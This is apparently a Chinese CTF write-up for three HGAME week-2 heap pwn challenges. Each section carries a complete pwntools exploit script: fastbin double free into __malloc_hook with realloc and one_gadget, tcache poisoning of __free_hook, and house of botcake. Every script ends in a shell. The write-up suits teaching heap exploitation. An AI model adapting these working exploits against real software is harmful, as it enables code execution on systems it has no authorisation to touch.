HGAME week2 复现

PWN:

fast_note:

UAF + fastbin attack（glibc 2.23）。直接把 one_gadget 写进 __malloc_hook 时栈上的约束不满足，所以此题把 one_gadget 写进 __realloc_hook、把 __malloc_hook 改成 realloc+偏移，借 realloc 开头的几条 push 调整 rsp，才能打通 one_gadget。
exp:

from pwn import *
# pwntools setup: verbose tube logging, x86-64 packing for p64/u64, and a
# side-by-side tmux pane for gdb.attach().
context(log_level="debug", arch="amd64", terminal=["tmux", "splitw", "-h"])

# Target binary and the libc it was solved against (glibc 2.23: no tcache,
# so the attack goes through fastbins and __malloc_hook).
elf = ELF("./vuln")
libc = ELF("./libc-2.23.so")

# Local run by default; swap the two lines to go against the remote service.
io = process("./vuln")
# io=remote("node1.anna.nssctf.cn",28391)

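def add(n, s, cc):
    """Menu option 1: allocate note `n` with size `s` and write `cc` into it.

    `cc` is sent raw with sendafter (no trailing newline) so exact byte
    layouts -- fake fd pointers, hook addresses -- are not disturbed; it must
    be bytes.  Index and size are encoded explicitly: pwntools tubes expect
    bytes and only tolerate str through an implicit ASCII encoding.
    """
    io.sendlineafter(b">", b"1")
    io.sendlineafter(b"Index: ", str(n).encode())
    io.sendlineafter(b"Size: ", str(s).encode())
    io.sendafter(b"Content: ", cc)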
    
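def delete(n):
    """Menu option 2: free note `n`.

    The program keeps the dangling pointer (UAF), so a deleted index can
    still be freed again or shown.  The index is sent as bytes rather than
    relying on pwntools' implicit str -> ASCII conversion.
    """
    io.sendlineafter(b">", b"2")
    io.sendlineafter(b"Index: ", str(n).encode())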
    
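def show(n):
    """Menu option 3: print the content of note `n`.

    Works on freed notes too (UAF), which is how the libc pointers left in a
    freed chunk are leaked.  The caller is responsible for reading the
    output from `io`.  Index is encoded explicitly to bytes.
    """
    io.sendlineafter(b">", b"3")
    io.sendlineafter(b"Index: ", str(n).encode())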
    
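# --- libc leak ----------------------------------------------------------------
# Notes 0 and 1 (0x70 chunks) are the fastbin double-free pair, note 2 (0x90)
# is the leak chunk, note 3 is a small guard so freeing 2 does not merge it
# into the top chunk.
add(0, 0x60, b"qqq")  # 0
add(1, 0x60, b"www")  # 1
add(2, 0x80, b"eee")  # 2
add(3, 0x10, b"rrr")  # 3

# glibc 2.23 has no tcache: the freed 0x90 chunk lands in the unsorted bin
# with fd/bk pointing into main_arena.  Re-allocating the same size hands the
# same memory back as note 4 without clearing it; the 8 non-NUL bytes cover
# fd so that show() (presumably a NUL-terminated print) runs on into bk.
delete(2)
add(4, 0x80, b"A" * 7 + b"b")  # 4
show(4)
# live notes in heap order: 0, 1, 4, 3
io.recvuntil(b"b")
# bk == &main_arena + 0x58; main_arena is at 0x3C4B20 in this libc-2.23
# build (equivalently __malloc_hook + 0x10).
libc_addr = u64(io.recv(6).ljust(8, b"\x00")) - 0x58 - 0x3C4B20
print("libc_addr: " + hex(libc_addr))
# A libc base is page aligned; anything else means the leak was mis-parsed,
# and continuing would write garbage into __malloc_hook.
if libc_addr & 0xFFF:
    log.error("bad libc leak: %#x" % libc_addr)
# pwntools symbol tables are keyed by str (a bytes key only matches on
# Python 2, where bytes is str).
malloc_hook = libc_addr + libc.sym["__malloc_hook"]
realloc = libc_addr + libc.sym["__libc_realloc"]
one_gadget = [0x45226, 0x4527A, 0xF03A4, 0xF1247]  # libc-2.23 offsets, see below
shell = libc_addr + one_gadget[3]

# gdb.attach(io)
# pause()

# --- fastbin double free -> __malloc_hook --------------------------------------
# The fastbin double-free check only compares against the bin head, so the
# order 0, 1, 0 passes and leaves the 0x70 bin as 0 -> 1 -> 0.
delete(0)
delete(1)
delete(0)  # 0->1->0

# Take 0 back and overwrite its fd with a fake chunk: on this libc the bytes
# at __malloc_hook-0x23 form a 0x7f size field, which satisfies the fastbin
# size check for the 0x70 bin.
add(5, 0x60, p64(malloc_hook - 0x23))
add(6, 0x60, b"aaa")  # chunk 1
add(7, 0x60, b"qqq")  # chunk 0 again
# The next 0x70 allocation is the fake chunk; its user data starts at
# __malloc_hook-0x13.  0xb bytes of padding reach __realloc_hook
# (__malloc_hook-8), which receives the one_gadget; __malloc_hook itself is
# pointed a few bytes into realloc so that part of realloc's prologue is
# skipped, shifting rsp until the gadget's [rsp+0x70] == NULL constraint
# (see the one_gadget output below) holds.
add(8, 0x60, cyclic(0xb) + p64(shell) + p64(realloc + 0x6))

# Trigger: any malloc now goes through __malloc_hook.  Sent by hand rather
# than via add() because the "Content: " prompt never arrives once the hook
# fires.
io.sendlineafter(b">", b"1")
io.sendlineafter(b"Index: ", b"9")
io.sendlineafter(b"Size: ", str(0x60).encode())

io.interactive()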

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

editable_note:

tcache 环境（glibc 2.31）。利用 UAF show 读出 unsortedbin 中 chunk 的 fd 泄露 libc，再用 UAF edit 改写 tcache 中 chunk 的 next 指针（tcache poisoning），把 __free_hook 分配出来改成 system。
exp:

#one_gadget条件限制太多了,打free_hook
from pwn import *
# Verbose tube logging, amd64 packing, gdb.attach() in a horizontal tmux split.
context(log_level="debug", arch="amd64", terminal=["tmux", "splitw", "-h"])

# Binary plus the remote libc (glibc 2.31: tcache present, no safe-linking).
elf = ELF("./vuln")
libc = ELF("./libc-2.31.so")

# Remote target by default; uncomment process() for a local run.
io = remote("node1.anna.nssctf.cn", 28799)
# io=process("./vuln")

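def add(n, s):
    """Menu option 1: allocate note `n` with size `s` (no content prompt here).

    Index and size are encoded explicitly to bytes instead of relying on
    pwntools' implicit str -> ASCII conversion.
    """
    io.sendlineafter(b">", b"1")
    io.sendlineafter(b"Index: ", str(n).encode())
    io.sendlineafter(b"Size: ", str(s).encode())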

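def delete(n):
    """Menu option 2: free note `n`; the pointer is not cleared (UAF)."""
    io.sendlineafter(b">", b"2")
    io.sendlineafter(b"Index: ", str(n).encode())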

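def edit(n, cc):
    """Menu option 3: overwrite the content of note `n` with `cc`.

    Also works on freed notes (UAF), which is what the tcache poisoning
    relies on.  `cc` must be bytes and is sent raw, without a newline, so a
    p64() pointer is written exactly as given.
    """
    io.sendlineafter(b">", b"3")
    io.sendlineafter(b"Index: ", str(n).encode())
    io.sendafter(b"Content: ", cc)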
    
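def show(n):
    """Menu option 4: print the content of note `n` (freed notes included).

    The caller reads the leaked bytes from `io`.  Index is sent as bytes.
    """
    io.sendlineafter(b">", b"4")
    io.sendlineafter(b"Index: ", str(n).encode())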
    
# gdb.attach(io)    
# pause()
    
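# Eight 0x90 chunks: on free the first seven fill the 0x90 tcache bin and the
# eighth falls through to the unsorted bin, where it picks up main_arena
# pointers.
for i in range(8):
    add(i, 0x80)
# Small guard chunk so the last free does not consolidate into top.
add(8, 0x10)
for i in range(8):
    delete(i)

# UAF: show() still prints the freed note, leaking its unsorted-bin fd
# (&main_arena + 0x60; main_arena is at 0x1ECB80 in this libc-2.31 build,
# i.e. __malloc_hook + 0x10).
show(7)
leak_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x60 - 0x1ECB80
print("leak_addr: " + hex(leak_addr))
# The base must be page aligned; bail out instead of poisoning tcache with a
# garbage address.
if leak_addr & 0xFFF:
    log.error("bad libc leak: %#x" % leak_addr)

# pwntools symbol tables are keyed by str, not bytes.
free_hook = leak_addr + libc.sym["__free_hook"]
sys_addr = leak_addr + libc.sym["system"]

# tcache poisoning: note 6 was freed last of the seven, so it is the head of
# the 0x90 tcache list; rewriting its next pointer through the UAF makes the
# second allocation return __free_hook itself.  glibc 2.31 does not apply
# safe-linking or an alignment check in tcache_get, so a raw pointer works.
edit(6, p64(free_hook))
add(9, 0x80)   # note 6's chunk
add(10, 0x80)  # __free_hook
edit(10, p64(sys_addr))

# free("/bin/sh") now goes through __free_hook -> system("/bin/sh").
add(11, 0x20)
edit(11, b"/bin/sh")
delete(11)

io.interactive()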

new_fast_note:

此题存在 UAF 但没有 edit 函数，无法像上一题那样直接改写 tcache 的 next 指针；可以用 house of botcake 制造 chunk overlap，通过新申请的大 chunk 覆盖到已释放 chunk 的 next 指针，从而实现任意地址分配，劫持 __free_hook（glibc 2.31）。

house of botcake:
绕过 tcache->key 的检查:

申请 7 个大小相同、大于 0x80（不落入 fastbin）的 chunk，再申请三个同样大小的 chunk A、chunk B、chunk C（C 只用来隔开 B 和 top chunk，后面不参与操作）
释放前 7 个和 chunk A,前面 7 个都会进入到 tcachebin 里面,chunk A 进入到 unsortedbin
释放 chunk B，chunk B 会向前与 unsortedbin 里的 chunk A 合并成一个更大的 unsortedbin chunk
从 tcachebin 分配走一个，给 B 腾出一个 tcache 位置
再次释放 chunk B（B 之前没进过 tcache，key 字段不是 tcache，double free 检查拦不住），此时 B 同时存在于 unsortedbin（作为 A+B 合并块的一部分）和 tcachebin；再从 unsortedbin 申请一块比 A 大的 chunk（本题 0xc0），写入的数据就能越过 B 的 chunk 头覆盖它在 tcache 里的 next 指针，从而把任意地址（这里是 __free_hook）分配出来

exp:

from pwn import *
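# Verbose tube logging, amd64 packing, gdb.attach() in a horizontal tmux split.
context(log_level="debug", arch="amd64", terminal=["tmux", "splitw", "-h"])

# Host is passed as str, as in the other exploits: pwntools' remote() takes a
# text hostname; a bytes host only worked because socket.getaddrinfo happens
# to accept it, and it shows up as b'...' in the connection log.
io = remote("node3.anna.nssctf.cn", 28740)
# io=process("./vuln")
# Remote libc: glibc 2.31 (tcache, no safe-linking).
libc = ELF("./libc-2.31.so")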

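def add(n, s, cc):
    """Menu option 1: allocate note `n` with size `s` and fill it with `cc`.

    `cc` must be bytes and is sent raw (no newline) so pointer payloads are
    written exactly.  Index and size are encoded to bytes explicitly rather
    than relying on pwntools' implicit str -> ASCII conversion.
    """
    io.sendlineafter(b">", b"1")
    io.sendlineafter(b"Index: ", str(n).encode())
    io.sendlineafter(b"Size: ", str(s).encode())
    io.sendafter(b"Content: ", cc)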

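def delete(n):
    """Menu option 2: free note `n`.

    The index stays usable afterwards (UAF), which house of botcake needs in
    order to free the same chunk twice.  Index is sent as bytes.
    """
    io.sendlineafter(b">", b"2")
    io.sendlineafter(b"Index: ", str(n).encode())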

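def show(n):
    """Menu option 3: print the content of note `n` (works on freed notes).

    The caller reads the leaked bytes from `io`.  Index is sent as bytes.
    """
    io.sendlineafter(b">", b"3")
    io.sendlineafter(b"Index: ", str(n).encode())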
        
# gdb.attach(io)
# pause()

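# Layout for house of botcake: seven tcache fillers (0..6) plus chunk A
# (note 7), all 0xa0 chunks, then B (note 8), a same-size separator C
# (note 9, never touched again) and a small extra guard (note 10) so B
# cannot merge with top when freed.  Every note holds "/bin/sh" so that any
# of them can be the argument of the final free().
for i in range(8):
    add(i, 0x90, b"/bin/sh")

add(8, 0x90, b"/bin/sh")   # chunk B
add(9, 0x90, b"/bin/sh")   # chunk C, separator
add(10, 0x10, b"/bin/sh")  # guard against consolidation with top

# 0..6 fill the 0xa0 tcache bin; A (note 7) goes to the unsorted bin.
for i in range(8):
    delete(i)

# UAF leak of A's unsorted-bin fd (&main_arena + 0x60; main_arena is at
# 0x1ECB80 in this libc-2.31 build, i.e. __malloc_hook + 0x10).
show(7)
leak_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x60 - 0x1ECB80
print("leak_addr: " + hex(leak_addr))
# Page-aligned or the leak was mis-parsed; stop before poisoning tcache.
if leak_addr & 0xFFF:
    log.error("bad libc leak: %#x" % leak_addr)

# pwntools symbol tables are keyed by str, not bytes.
sys_addr = leak_addr + libc.sym["system"]
free_hook = leak_addr + libc.sym["__free_hook"]

# Free B while A sits in the unsorted bin: B consolidates backwards with A
# into one larger unsorted chunk that starts at A.
delete(8)

# Pop one filler from tcache (note 11 <- chunk 6) to make room in the bin ...
add(11, 0x90, b"/bin/sh")

# ... then free B again.  B was never in tcache, so its key field is not
# tcache's and the double-free check does not fire; B is now in the 0xa0
# tcache list AND inside the unsorted A+B chunk.
delete(8)

# Carve 0xd0 out of the unsorted chunk: the returned memory starts at A's
# data and runs over B's header.  0x90 bytes of A's data + 0x10 bytes of
# B's chunk header (B's size field is clobbered -- harmless here because
# tcache_get in 2.31 does not check it), then B's tcache next pointer,
# which now points at __free_hook.
add(12, 0xc0, cyclic(0xa0) + p64(free_hook))
add(13, 0x90, b"qqq")         # B, from tcache
add(14, 0x90, p64(sys_addr))  # __free_hook <- system
# note 11 holds "/bin/sh": free() -> __free_hook -> system("/bin/sh")
delete(11)

io.interactive()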